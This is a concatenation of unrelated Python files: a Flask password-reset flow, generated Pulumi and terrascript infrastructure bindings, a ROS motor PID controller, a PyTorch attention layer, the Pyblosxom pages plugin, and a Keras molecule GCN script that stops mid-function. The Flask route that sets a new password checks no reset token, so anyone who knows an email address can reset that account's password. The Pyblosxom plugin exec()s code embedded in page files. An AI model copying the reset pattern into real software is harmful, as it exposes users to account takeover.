email = form.email.data
user = find_user_active(email, True)
if user is None:
flash("No such user in the database", "danger")
return redirect(url_for("main.home"))
send_forgot_email(email, user["name"])
flash(f"Email to {email}send", "success")
return redirect(url_for("main.home"))
return render_template("reset_password.html", form=form)
@forgot_bp.route("/reset/<token>")
def reset_password(token):
"""Reset password
:param token: token to reset password
:return: redirect to index or Bad request
"""
try:
forgot_serializer = URLSafeTimedSerializer(secret_key)
email = forgot_serializer.loads(token, salt='email-reset-salt', max_age=5400)
except: # pylint: disable=bare-except
return "The reset link is invalid or has expired."
if find_user(email, ""):
user = find_user_active(email, False)
if not user:
return redirect(url_for("forgot.reset_password_form", email=email))
flash(f"Email {email} is not registered", "danger")
return redirect(url_for("main.home"))
flash(f"Email {email} not in the database", "danger")
return redirect(url_for("main.home"))
@forgot_bp.route("/reset/form/<email>", methods=["GET", "POST"])
def reset_password_form(email):
"""Set new password
:param email: user's email
:return: redirect to index or Bad request
"""
form = ResetForm()
if form.validate_on_submit():
new_password = form.new_password.data
confirm_password = form.confirm_password.data
user = find_user_active(email, True)
if user is None:
flash("No such user in the database", "danger")
return redirect(url_for("main.home"))
if new_password != confirm_password:
flash("Passwords do not match", "danger")
return render_template("new_password.html", form=form, email=email)
update_user(user, {"$set": {"password": generate_password_hash(new_password)}})
flash(f"Password has been changed", "success")
return redirect(url_for("main.home"))
return render_template("new_password.html", form=form, email=email)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
__all__ = [
'GetNodePoolResult',
'AwaitableGetNodePoolResult',
'get_node_pool',
]
@pulumi.output_type
class GetNodePoolResult:
"""
A collection of values returned by getNodePool.
"""
def __init__(__self__, annotations=None, cluster_id=None, control_plane=None, delete_not_ready_after_secs=None, etcd=None, hostname_prefix=None, id=None, labels=None, name=None, node_taints=None, node_template_id=None, quantity=None, worker=None):
if annotations and not isinstance(annotations, dict):
raise TypeError("Expected argument 'annotations' to be a dict")
pulumi.set(__self__, "annotations", annotations)
if cluster_id and not isinstance(cluster_id, str):
raise TypeError("Expected argument 'cluster_id' to be a str")
pulumi.set(__self__, "cluster_id", cluster_id)
if control_plane and not isinstance(control_plane, bool):
raise TypeError("Expected argument 'control_plane' to be a bool")
pulumi.set(__self__, "control_plane", control_plane)
if delete_not_ready_after_secs and not isinstance(delete_not_ready_after_secs, int):
raise TypeError("Expected argument 'delete_not_ready_after_secs' to be a int")
pulumi.set(__self__, "delete_not_ready_after_secs", delete_not_ready_after_secs)
if etcd and not isinstance(etcd, bool):
raise TypeError("Expected argument 'etcd' to be a bool")
pulumi.set(__self__, "etcd", etcd)
if hostname_prefix and not isinstance(hostname_prefix, str):
raise TypeError("Expected argument 'hostname_prefix' to be a str")
pulumi.set(__self__, "hostname_prefix", hostname_prefix)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if labels and not isinstance(labels, dict):
raise TypeError("Expected argument 'labels' to be a dict")
pulumi.set(__self__, "labels", labels)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if node_taints and not isinstance(node_taints, list):
raise TypeError("Expected argument 'node_taints' to be a list")
pulumi.set(__self__, "node_taints", node_taints)
if node_template_id and not isinstance(node_template_id, str):
raise TypeError("Expected argument 'node_template_id' to be a str")
pulumi.set(__self__, "node_template_id", node_template_id)
if quantity and not isinstance(quantity, int):
raise TypeError("Expected argument 'quantity' to be a int")
pulumi.set(__self__, "quantity", quantity)
if worker and not isinstance(worker, bool):
raise TypeError("Expected argument 'worker' to be a bool")
pulumi.set(__self__, "worker", worker)
@property
@pulumi.getter
def annotations(self) -> Mapping[str, Any]:
"""
(Computed) Annotations for Node Pool object (map)
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> str:
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="controlPlane")
def control_plane(self) -> bool:
"""
(Computed) RKE control plane role for created nodes (bool)
"""
return pulumi.get(self, "control_plane")
@property
@pulumi.getter(name="deleteNotReadyAfterSecs")
def delete_not_ready_after_secs(self) -> int:
"""
(Computed) Delete not ready node after secs. Default `0` (int)
"""
return pulumi.get(self, "delete_not_ready_after_secs")
@property
@pulumi.getter
def etcd(self) -> bool:
"""
(Computed) RKE etcd role for created nodes (bool)
"""
return pulumi.get(self, "etcd")
@property
@pulumi.getter(name="hostnamePrefix")
def hostname_prefix(self) -> str:
"""
(Computed) The prefix for created nodes of the Node Pool (string)
"""
return pulumi.get(self, "hostname_prefix")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def labels(self) -> Mapping[str, Any]:
"""
(Computed) Labels for Node Pool object (map)
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> Sequence['outputs.GetNodePoolNodeTaintResult']:
"""
(Computed) Node taints (List)
"""
return pulumi.get(self, "node_taints")
@property
@pulumi.getter(name="nodeTemplateId")
def node_template_id(self) -> str:
return pulumi.get(self, "node_template_id")
@property
@pulumi.getter
def quantity(self) -> int:
"""
(Computed) The number of nodes to create on Node Pool (int)
"""
return pulumi.get(self, "quantity")
@property
@pulumi.getter
def worker(self) -> bool:
"""
        (Computed) RKE worker role for created nodes (bool)
"""
return pulumi.get(self, "worker")
class AwaitableGetNodePoolResult(GetNodePoolResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNodePoolResult(
annotations=self.annotations,
cluster_id=self.cluster_id,
control_plane=self.control_plane,
delete_not_ready_after_secs=self.delete_not_ready_after_secs,
etcd=self.etcd,
hostname_prefix=self.hostname_prefix,
id=self.id,
labels=self.labels,
name=self.name,
node_taints=self.node_taints,
node_template_id=self.node_template_id,
quantity=self.quantity,
worker=self.worker)
def get_node_pool(cluster_id: Optional[str] = None,
name: Optional[str] = None,
node_template_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNodePoolResult:
"""
Use this data source to retrieve information about a Rancher v2 Node Pool resource.
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
foo = rancher2.get_node_pool(cluster_id=rancher2_cluster["foo-custom"]["id"],
name="foo")
```
:param str cluster_id: The RKE cluster id to use Node Pool (string)
:param str name: The name of the Node Pool (string)
:param str node_template_id: The Node Template ID to use for node creation (string)
"""
__args__ = dict()
__args__['clusterId'] = cluster_id
__args__['name'] = name
__args__['nodeTemplateId'] = node_template_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('rancher2:index/getNodePool:getNodePool', __args__, opts=opts, typ=GetNodePoolResult).value
return AwaitableGetNodePoolResult(
annotations=__ret__.annotations,
cluster_id=__ret__.cluster_id,
control_plane=__ret__.control_plane,
delete_not_ready_after_secs=__ret__.delete_not_ready_after_secs,
etcd=__ret__.etcd,
hostname_prefix=__ret__.hostname_prefix,
id=__ret__.id,
labels=__ret__.labels,
name=__ret__.name,
node_taints=__ret__.node_taints,
node_template_id=__ret__.node_template_id,
quantity=__ret__.quantity,
worker=__ret__.worker)
|
#!/usr/bin/env python
import rospy
import std_msgs.msg
import phidgets.msg
import geometry_msgs.msg
#####################################################
# Initialize Variables #
#####################################################
ENCODER_LEFT = 0
ENCODER_RIGHT = 0
LINEAR_VELOCITY = 0.0
ANGULAR_VELOCITY = 0.0
#####################################################
# /left_motor/encoder Callback #
#####################################################
def update_feedback_enc_left(feedback_enc):
global ENCODER_LEFT, ENCODER_LEFT_TEMP, has_updated_left
ENCODER_LEFT = feedback_enc.count_change
# self.FEEDBACK_ENC_UPDATED = True
#####################################################
# /right_motor/encoder Callback #
#####################################################
def update_feedback_enc_right(feedback_enc):
global ENCODER_RIGHT, ENCODER_RIGHT_TEMP, has_updated_right
# NOTE THE MINUS SIGN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ENCODER_RIGHT = -feedback_enc.count_change
#####################################################
# /keyboard/vel Callback #
#####################################################
def update_feedback_keyboard_vel(feedback_enc):
global LINEAR_VELOCITY, ANGULAR_VELOCITY
LINEAR_VELOCITY = feedback_enc.linear.x
ANGULAR_VELOCITY = feedback_enc.angular.z
#####################################################
# Initialize Publisher #
#####################################################
rospy.init_node('motor_control_node', anonymous=True)
pub_LEFT_MOTOR = rospy.Publisher('/left_motor/cmd_vel', std_msgs.msg.Float32, queue_size=1)
pub_RIGHT_MOTOR = rospy.Publisher('/right_motor/cmd_vel', std_msgs.msg.Float32, queue_size=1)
rate = rospy.Rate(10)
rospy.Subscriber('/left_motor/encoder', phidgets.msg.motor_encoder, update_feedback_enc_left)
rospy.Subscriber('/right_motor/encoder', phidgets.msg.motor_encoder, update_feedback_enc_right)
rospy.Subscriber('/keyboard/vel', geometry_msgs.msg.Twist, update_feedback_keyboard_vel)
#####################################################
# Controller Function #
#####################################################
def controller():
global LINEAR_VELOCITY, ANGULAR_VELOCITY,ENCODER_LEFT, ENCODER_RIGHT
# global parameters
pi = 3.14
control_frequency = 10
ticks_per_rev = 897.96*5
# vehicle parameters
dt = 0.1
base = 0.24
wheel_radius = 0.0485
# error integral part
int_error_left = 0.0
int_error_right = 0.0
# PID parameters
Kp_left = 30.0
Kp_right = 35.0
Ki_left = 400.0
Ki_right = 400.0
Kd_left = 0
Kd_right = 0
PWM = std_msgs.msg.Float32()
while not rospy.is_shutdown():
#####################################################
# Left Wheels #
#####################################################
estimated_w = (ENCODER_LEFT * 2 * pi * control_frequency) / (ticks_per_rev)
desired_w = 0.2*0.25*(LINEAR_VELOCITY - (base / 2.0) * ANGULAR_VELOCITY) / wheel_radius
print("est,desired left", estimated_w, desired_w)
error = desired_w - estimated_w
print("Error left", error)
int_error_left = int_error_left + error * dt
PWM_LEFT = (int)(Kp_left * error + Ki_left * int_error_left)
#####################################################
# Right Wheels #
#####################################################
estimated_w = (ENCODER_RIGHT * 2 * pi * control_frequency) / (ticks_per_rev)
desired_w = 0.33*0.2*(LINEAR_VELOCITY + (base / 2.0) * ANGULAR_VELOCITY) / wheel_radius
print("est,desired right", estimated_w, desired_w)
error = desired_w - estimated_w
print("Error right", error)
int_error_right = int_error_right + error * dt
PWM_RIGHT = (int)(Kp_right * error + Ki_right * int_error_right)
print("encoder ", ENCODER_LEFT, ENCODER_RIGHT)
print("PWM", PWM_LEFT, PWM_RIGHT)
if (abs(LINEAR_VELOCITY) < 0.001 and abs(ANGULAR_VELOCITY) < 0.001):
PWM_LEFT = 0
PWM_RIGHT = 0
PWM.data = PWM_LEFT
pub_LEFT_MOTOR.publish(PWM)
PWM.data = -PWM_RIGHT
pub_RIGHT_MOTOR.publish(PWM)
rate.sleep()
#####################################################
# Main Function #
#####################################################
if __name__ == "__main__":
try:
controller()
except rospy.ROSInterruptException:
pass
|
import torch
from torch import nn
from conversion_config import Config
import torch.nn.functional as F
import math
class Attn(nn.Module):
def __init__(self,hidden_size):
super(Attn, self).__init__()
self.hidden_size = hidden_size
self.attn = nn.Linear(self.hidden_size * 2, hidden_size)
self.v = nn.Parameter(torch.rand(hidden_size))
stdv = 1. / math.sqrt(self.v.size(0))
self.v.data.normal_(mean=0, std=stdv)
def forward(self, hidden, encoder_outputs):
max_len = encoder_outputs.size(1)
this_batch_size = encoder_outputs.size(0)
H = hidden.repeat(max_len,1,1).transpose(0,1)
attn_energies = self.score(H,encoder_outputs)
        return F.softmax(attn_energies, dim=1).unsqueeze(1)
    def score(self, hidden, encoder_outputs):
        energy = torch.tanh(self.attn(torch.cat([hidden, encoder_outputs], 2)))
energy = energy.transpose(2,1)
v = self.v.repeat(encoder_outputs.data.shape[0],1).unsqueeze(1)
energy = torch.bmm(v,energy)
return energy.squeeze(1)
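# A minimal smoke test of the attention module (illustrative only; the real
# hidden size would normally come from conversion_config.Config, here we just
# pick 16 so the example is self-contained):
if __name__ == "__main__":
    attn = Attn(hidden_size=16)
    decoder_hidden = torch.zeros(4, 16)           # (batch, hidden_size)
    encoder_outputs = torch.zeros(4, 10, 16)      # (batch, max_len, hidden_size)
    weights = attn(decoder_hidden, encoder_outputs)
    print(weights.shape)                          # expected: torch.Size([4, 1, 10])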
|
# terrascript/resource/philips-software/hsdp.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:56 UTC)
import terrascript
class hsdp_ai_inference_compute_environment(terrascript.Resource):
pass
class hsdp_ai_inference_compute_target(terrascript.Resource):
pass
class hsdp_ai_inference_job(terrascript.Resource):
pass
class hsdp_ai_inference_model(terrascript.Resource):
pass
class hsdp_ai_workspace(terrascript.Resource):
pass
class hsdp_ai_workspace_compute_target(terrascript.Resource):
pass
class hsdp_cdl_data_type_definition(terrascript.Resource):
pass
class hsdp_cdl_export_route(terrascript.Resource):
pass
class hsdp_cdl_label_definition(terrascript.Resource):
pass
class hsdp_cdl_research_study(terrascript.Resource):
pass
class hsdp_cdr_org(terrascript.Resource):
pass
class hsdp_cdr_subscription(terrascript.Resource):
pass
class hsdp_container_host(terrascript.Resource):
pass
class hsdp_container_host_exec(terrascript.Resource):
pass
class hsdp_dicom_gateway_config(terrascript.Resource):
pass
class hsdp_dicom_object_store(terrascript.Resource):
pass
class hsdp_dicom_remote_node(terrascript.Resource):
pass
class hsdp_dicom_repository(terrascript.Resource):
pass
class hsdp_dicom_store_config(terrascript.Resource):
pass
class hsdp_edge_app(terrascript.Resource):
pass
class hsdp_edge_config(terrascript.Resource):
pass
class hsdp_edge_custom_cert(terrascript.Resource):
pass
class hsdp_edge_sync(terrascript.Resource):
pass
class hsdp_function(terrascript.Resource):
pass
class hsdp_iam_application(terrascript.Resource):
pass
class hsdp_iam_client(terrascript.Resource):
pass
class hsdp_iam_email_template(terrascript.Resource):
pass
class hsdp_iam_group(terrascript.Resource):
pass
class hsdp_iam_mfa_policy(terrascript.Resource):
pass
class hsdp_iam_org(terrascript.Resource):
pass
class hsdp_iam_password_policy(terrascript.Resource):
pass
class hsdp_iam_proposition(terrascript.Resource):
pass
class hsdp_iam_role(terrascript.Resource):
pass
class hsdp_iam_service(terrascript.Resource):
pass
class hsdp_iam_user(terrascript.Resource):
pass
class hsdp_metrics_autoscaler(terrascript.Resource):
pass
class hsdp_notification_producer(terrascript.Resource):
pass
class hsdp_notification_subscriber(terrascript.Resource):
pass
class hsdp_notification_subscription(terrascript.Resource):
pass
class hsdp_notification_topic(terrascript.Resource):
pass
class hsdp_pki_cert(terrascript.Resource):
pass
class hsdp_pki_tenant(terrascript.Resource):
pass
class hsdp_s3creds_policy(terrascript.Resource):
pass
__all__ = [
"hsdp_ai_inference_compute_environment",
"hsdp_ai_inference_compute_target",
"hsdp_ai_inference_job",
"hsdp_ai_inference_model",
"hsdp_ai_workspace",
"hsdp_ai_workspace_compute_target",
"hsdp_cdl_data_type_definition",
"hsdp_cdl_export_route",
"hsdp_cdl_label_definition",
"hsdp_cdl_research_study",
"hsdp_cdr_org",
"hsdp_cdr_subscription",
"hsdp_container_host",
"hsdp_container_host_exec",
"hsdp_dicom_gateway_config",
"hsdp_dicom_object_store",
"hsdp_dicom_remote_node",
"hsdp_dicom_repository",
"hsdp_dicom_store_config",
"hsdp_edge_app",
"hsdp_edge_config",
"hsdp_edge_custom_cert",
"hsdp_edge_sync",
"hsdp_function",
"hsdp_iam_application",
"hsdp_iam_client",
"hsdp_iam_email_template",
"hsdp_iam_group",
"hsdp_iam_mfa_policy",
"hsdp_iam_org",
"hsdp_iam_password_policy",
"hsdp_iam_proposition",
"hsdp_iam_role",
"hsdp_iam_service",
"hsdp_iam_user",
"hsdp_metrics_autoscaler",
"hsdp_notification_producer",
"hsdp_notification_subscriber",
"hsdp_notification_subscription",
"hsdp_notification_topic",
"hsdp_pki_cert",
"hsdp_pki_tenant",
"hsdp_s3creds_policy",
]
|
#######################################################################
# This file is part of Pyblosxom.
#
# Copyright (c) 2002-2011 Will Kahn-Greene
#
# Pyblosxom is distributed under the MIT license. See the file
# LICENSE for distribution details.
#######################################################################
"""
Summary
=======
Blogs don't always consist solely of blog entries. Sometimes you want
to add other content to your blog that's not a blog entry. For
example, an "about this blog" page or a page covering a list of your
development projects.
This plugin allows you to have pages served by Pyblosxom that aren't
blog entries.
Additionally, this plugin allows you to have a non-blog-entry front
page. This makes it easier to use Pyblosxom to run your entire
website.
Install
=======
This plugin comes with Pyblosxom. To install, do the following:
1. add ``Pyblosxom.plugins.pages`` to the ``load_plugins`` list in
your ``config.py`` file.
2. configure the plugin using the configuration variables below
``pagesdir``
This is the directory that holds the pages files.
For example, if you wanted your pages in
``/home/foo/blog/pages/``, then you would set it to::
py["pagesdir"] = "/home/foo/blog/pages/"
If you have ``blogdir`` defined in your ``config.py`` file which
holds your ``datadir`` and ``flavourdir`` directories, then you
could set it to::
py["pagesdir"] = os.path.join(blogdir, "pages")
``pages_trigger`` (optional)
Defaults to ``pages``.
This is the url trigger that causes the pages plugin to look for
pages.
py["pages_trigger"] = "pages"
``pages_frontpage`` (optional)
Defaults to False.
If set to True, then pages will show the ``frontpage`` page for
the front page.
This requires you to have a ``frontpage`` file in your pages
directory. The extension for this file works the same way as blog
entries. So if your blog entries end in ``.txt``, then you would
need a ``frontpage.txt`` file.
Example::
py["pages_frontpage"] = True
Usage
=====
Pages looks for urls that start with the trigger ``pages_trigger``
value as set in your ``config.py`` file. For example, if your
``pages_trigger`` was ``pages``, then it would look for urls like
this::
/pages/blah
/pages/blah.html
and pulls up the file ``blah.txt`` [1]_ which is located in the path
specified in the config file as ``pagesdir``.
If the file is not there, it kicks up a 404.
.. [1] The file ending (the ``.txt`` part) can be any file ending
that's valid for entries on your blog. For example, if you have
the textile entryparser installed, then ``.txtl`` is also a valid
file ending.
Template
========
pages formats the page using the ``pages`` template. So you need a
``pages`` template in the flavours that you want these pages to be
rendered in. I copy my ``story`` template and remove some bits.
For example, if you're using the html flavour and that is stored in
``/home/foo/blog/flavours/html.flav/``, then you could copy the
``story`` file in that directory to ``pages`` and that would become
your ``pages`` template.
Python code blocks
==================
pages handles evaluating python code blocks. Enclose python code in
``<%`` and ``%>``. The assumption is that only you can edit your
pages files, so there are no restrictions (security or otherwise).
For example::
<%
print "testing"
%>
<%
x = { "apple": 5, "banana": 6, "pear": 4 }
for mem in x.keys():
print "<li>%s - %s</li>" % (mem, x[mem])
%>
The request object is available in python code blocks. Reference it
by ``request``. Example::
<%
config = request.get_configuration()
print "your datadir is: %s" % config["datadir"]
%>
"""
__author__ = "Will Kahn-Greene"
__email__ = "willg at bluesock dot org"
__version__ = "2011-10-22"
__url__ = "http://pyblosxom.github.com/"
__description__ = (
"Allows you to include non-blog-entry files in your site and have a "
"non-blog-entry front page.")
__category__ = "content"
__license__ = "MIT"
__registrytags__ = "1.4, 1.5, core"
import os
import StringIO
import sys
import os.path
from Pyblosxom.entries.fileentry import FileEntry
from Pyblosxom import tools
from Pyblosxom.tools import pwrap_error
TRIGGER = "pages"
INIT_KEY = "pages_pages_file_initiated"
def verify_installation(req):
config = req.get_configuration()
retval = True
if not 'pagesdir' in config:
pwrap_error("'pagesdir' property is not set in the config file.")
retval = False
elif not os.path.isdir(config["pagesdir"]):
pwrap_error(
"'pagesdir' directory does not exist. %s" % config["pagesdir"])
retval = False
return retval
def cb_date_head(args):
req = args["request"]
data = req.get_data()
if INIT_KEY in data:
args["template"] = ""
return args
def cb_date_foot(args):
return cb_date_head(args)
def eval_python_blocks(req, body):
localsdict = {"request": req}
globalsdict = {}
old_stdout = sys.stdout
old_stderr = sys.stderr
try:
start = 0
while body.find("<%", start) != -1:
start = body.find("<%")
end = body.find("%>", start)
if start != -1 and end != -1:
codeblock = body[start + 2:end].lstrip()
sys.stdout = StringIO.StringIO()
sys.stderr = StringIO.StringIO()
try:
exec codeblock in localsdict, globalsdict
except Exception, e:
print "ERROR in processing: %s" % e
output = sys.stdout.getvalue() + sys.stderr.getvalue()
body = body[:start] + output + body[end + 2:]
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
return body
def is_frontpage(pyhttp, config):
if not config.get("pages_frontpage"):
return False
pathinfo = pyhttp.get("PATH_INFO", "")
if pathinfo == "/":
return True
path, ext = os.path.splitext(pathinfo)
if path == "/index" and not ext in [".rss20", ".atom", ".rss"]:
return True
return False
def is_trigger(pyhttp, config):
trigger = config.get("pages_trigger", TRIGGER)
if not trigger.startswith("/"):
trigger = "/" + trigger
return pyhttp["PATH_INFO"].startswith(trigger)
def cb_filelist(args):
req = args["request"]
pyhttp = req.get_http()
data = req.get_data()
config = req.get_configuration()
page_name = None
if not (is_trigger(pyhttp, config) or is_frontpage(pyhttp, config)):
return
data[INIT_KEY] = 1
datadir = config["datadir"]
data['root_datadir'] = config['datadir']
pagesdir = config["pagesdir"]
pagesdir = pagesdir.replace("/", os.sep)
if not pagesdir[-1] == os.sep:
pagesdir = pagesdir + os.sep
pathinfo = pyhttp.get("PATH_INFO", "")
path, ext = os.path.splitext(pathinfo)
if pathinfo == "/" or path == "/index":
page_name = "frontpage"
else:
page_name = pyhttp["PATH_INFO"][len("/" + TRIGGER) + 1:]
if not page_name:
return
# FIXME - need to do a better job of sanitizing
page_name = page_name.replace(os.sep, "/")
if not page_name:
return
if page_name[-1] == os.sep:
page_name = page_name[:-1]
if page_name.find("/") > 0:
page_name = page_name[page_name.rfind("/"):]
# if the page has a flavour, we use that. otherwise
# we default to the default flavour.
page_name, flavour = os.path.splitext(page_name)
if flavour:
data["flavour"] = flavour[1:]
ext = tools.what_ext(data["extensions"].keys(), pagesdir + page_name)
if not ext:
return []
data['root_datadir'] = page_name + '.' + ext
data['bl_type'] = 'file'
filename = pagesdir + page_name + "." + ext
if not os.path.isfile(filename):
return []
fe = FileEntry(req, filename, pagesdir)
# now we evaluate python code blocks
body = fe.get_data()
body = eval_python_blocks(req, body)
body = ("<!-- PAGES PAGE START -->\n\n" +
body +
"<!-- PAGES PAGE END -->\n")
fe.set_data(body)
fe["absolute_path"] = TRIGGER
fe["fn"] = page_name
fe["file_path"] = TRIGGER + "/" + page_name
fe["template_name"] = "pages"
data['blog_title_with_path'] = (
config.get("blog_title", "") + " : " + fe.get("title", ""))
# set the datadir back
config["datadir"] = datadir
return [fe]
|
import os
import time
import pickle
import numpy as np
import scipy.sparse as sp
import matplotlib.pyplot as plt
from keras import metrics
from keras import backend as K
from keras.models import Model
from keras.layers import (Input, Dense, Softmax, Lambda)
from keras.optimizers import Adagrad
from keras.initializers import RandomNormal
from rdkit.Chem import MolFromSmiles
from deepchem.feat import WeaveFeaturizer, ConvMolFeaturizer
from deepchem.splits import RandomSplitter, ScaffoldSplitter
from chainer_chemistry.dataset.parsers.csv_file_parser import CSVFileParser
from chainer_chemistry.dataset.preprocessors.nfp_preprocessor import NFPPreprocessor
from sklearn.metrics import (accuracy_score, precision_score, roc_auc_score,
recall_score, auc, average_precision_score,
roc_curve, precision_recall_curve)
def load_data(csv_fp, labels_col="p_np", smiles_col="smiles"):
"""
Load BBBP data
"""
    csvparser = CSVFileParser(NFPPreprocessor(), labels=labels_col, smiles_col=smiles_col)
    data_ = csvparser.parse(csv_fp, return_smiles=True)
atoms, adjs, labels = data_['dataset'].get_datasets()
smiles = data_['smiles']
return {"atoms": atoms,
"adjs": adjs,
"labels":labels,
"smiles": smiles}
def normalize_adj(adj, symmetric=True):
if symmetric:
d = sp.diags(np.power(np.array(adj.sum(1)), -0.5).flatten(), 0)
a_norm = adj.dot(d).transpose().dot(d).tocsr()
else:
d = sp.diags(np.power(np.array(adj.sum(1)), -1).flatten(), 0)
a_norm = d.dot(adj).tocsr()
return a_norm
def preprocess_adj(adj, symmetric=True):
adj = sp.csr_matrix(adj)
adj = adj + sp.eye(adj.shape[0])
adj = normalize_adj(adj, symmetric)
return adj.toarray()
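# Hedged sanity check (toy graph, not part of the original pipeline): for the
# path graph 0-1-2, A + I has degrees [2, 3, 2], so the symmetric normalization
# D^-1/2 (A + I) D^-1/2 has entry (0, 1) = 1 / sqrt(2 * 3) ~= 0.408:
#
#   A = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]])
#   preprocess_adj(A).round(3)
#   # -> [[0.5, 0.408, 0.], [0.408, 0.333, 0.408], [0., 0.408, 0.5]]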
def preprocess(raw_data, feats="convmol"):
"""
Preprocess molecule data
"""
labels = raw_data['labels']
smiles = raw_data['smiles']
adjs = raw_data['adjs']
num_classes = np.unique(labels).shape[0]
#One hot labels
labels_one_hot = np.eye(num_classes)[labels.reshape(-1)]
if feats == "weave":
featurizer = WeaveFeaturizer()
elif feats == "convmol":
featurizer = ConvMolFeaturizer()
mol_objs = featurizer.featurize([MolFromSmiles(smile) for smile in smiles])
#Sort feature matrices by node degree
node_features = []
for i,feat in enumerate(mol_objs):
sortind = np.argsort(adjs[i].sum(axis = 1) - 1)
N = len(sortind)
sortMatrix = np.eye(N)[sortind,:]
node_features.append(np.matmul(sortMatrix.T, feat.get_atom_features()))
#Normalize Adjacency Mats
norm_adjs = [preprocess_adj(A) for A in adjs]
return {'labels_one_hot': labels_one_hot,
'node_features': node_features,
'norm_adjs': norm_adjs}
def dense(n_hidden, activation='relu',
init_stddev=0.1, init_mean=0.0,
seed=None):
"""
Helper function for configuring `keras.layers.Dense`
"""
kernel_initializer = RandomNormal(mean=init_mean, stddev=init_stddev, seed=seed)
bias_initializer = RandomNormal(mean=init_mean, stddev=init_stddev, seed=seed)
return Dense(n_hidden, activation=activation,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
use_bias=True)
def matmul(XY):
"""
Matrix multiplication for use with `keras.layers.Lambda`
Compatible with `keras.models.Model`
"""
X,Y = XY
return K.tf.matmul(X,Y)
def GAP(X):
return K.tf.reduce_mean(X, axis=1, keepdims=True)
def keras_gcn(config):
"""
Keras GCN for graph classification
We must "fool" `keras.model.Model` into accepting
inputs tensors (adjacency matrix, node features)
of different shape in the first axis than target tensors.
Otherwise, e.g.
```
ValueError: Input arrays should have the same number of samples
as target arrays. Found 20 input samples and 1 target samples.
```
    Additionally, to write a matrix-multiplication layer compatible with
    `keras.models.Model` we must use `keras.layers.Lambda`.
"""
d = config['d']
init_stddev = config['init_stddev']
L1 = config['L1']
L2 = config['L2']
L3 = config['L3']
N = config['N']
num_classes = config['num_classes']
batch_size = config['batch_size']
assert batch_size == 1, "Batch size != 1 Not Implemented!"
A_batch = Input(shape=(batch_size,N,N), batch_shape=(batch_size,N,N))
X_batch = Input(shape=(batch_size,N,d), batch_shape=(batch_size,N,d))
Y = Input(shape=(batch_size, num_classes), batch_shape=(batch_size, num_classes))
h1 = dense(L1)(Lambda(matmul)([A_batch, X_batch]))
h2 = dense(L2)(Lambda(matmul)([A_batch, h1]))
h3 = dense(L3)(Lambda(matmul)([A_batch, h2]))
gap = Lambda(GAP)(h3)
    gap = Lambda(lambda y: K.squeeze(y, 1))(gap)
logits = dense(num_classes, activation='linear')(gap)
Y_hat = Softmax()(logits)
model = Model(inputs=[A_batch, X_batch], outputs=Y_hat)
model.compile(optimizer='adam',
loss=lambda y_true,y_pred: K.mean(K.binary_crossentropy(
y_true, logits, from_logits=True), axis=-1))
#loss='binary_crossentropy')
return model
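# Hedged usage sketch (the dimensions below are illustrative only, not taken
# from this repo's experiments): the model expects a (1, N, N) normalized
# adjacency matrix and a (1, N, d) node-feature matrix per training step.
#
#   config = {"d": 75, "init_stddev": 0.1, "L1": 64, "L2": 64, "L3": 64,
#             "N": 132, "num_classes": 2, "batch_size": 1}
#   model = keras_gcn(config)
#   # model.train_on_batch(x=[A_arr, X_arr], y=Y_arr) with shapes as above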
def gcn_train(model, data, num_epochs, train_inds):
norm_adjs = data['norm_adjs']
labels_one_hot = data['labels_one_hot']
    labels = np.argmax(labels_one_hot, axis=1)
    # Sample class-balanced batches from the training split only
    train_inds = np.asarray(train_inds)
    negind = train_inds[labels[train_inds] == 0]
    posind = train_inds[labels[train_inds] == 1]
    Nepoch = min(len(negind), len(posind))
node_features = data['node_features']
total_loss = []
for epoch in range(num_epochs):
epoch_loss = []
epoch_correct = []
#Train
rand_inds = np.random.permutation(np.concatenate((np.random.permutation(negind)[:Nepoch],np.random.permutation(posind)[:Nepoch])))
for ri in rand_inds:
A_arr = norm_adjs[ri][np.newaxis, :, :]
X_arr = node_features[ri][np.newaxis, :, :]
Y_arr = labels_one_hot[ri][np.newaxis, :]
sample_loss = model.train_on_batch(x=[A_arr, X_arr], y=Y_arr, )
epoch_loss.append(sample_loss)
#Eval
for ri in rand_inds:
A_arr = norm_adjs[ri][np.newaxis, :, :]
X_arr = node_features[ri][np.newaxis, :, :]
Y_arr = labels_one_hot[ri][np.newaxis, :]
sample_pred = model.predict([A_arr, X_arr])
sample_correct = np.argmax(sample_pred) == np.argmax(Y_arr)
epoch_correct.append(sample_correct)
mean_epoch_loss = sum(epoch_loss) / len(epoch_loss)
epoch_acc = sum(epoch_correct) / len(epoch_correct)
print("Epoch: {}, Mean Loss: {:.3f}, Accuracy: {:.3f}".format(epoch, mean_epoch_loss, epoch_acc))
total_loss.extend(epoch_loss)
last_epoch_acc = epoch_acc
return total_loss, last_epoch_acc
class MockDataset:
"""Mock Dataset class for a DeepChem Dataset"""
def __init__(self, smiles):
self.ids = smiles
def __len__(self):
return len(self.ids)
def partition_train_val_test(smiles, dataset):
"""
Split a molecule dataset (SMILES) with deepchem built-ins
"""
ds = MockDataset(smiles)
if dataset == "BBBP":
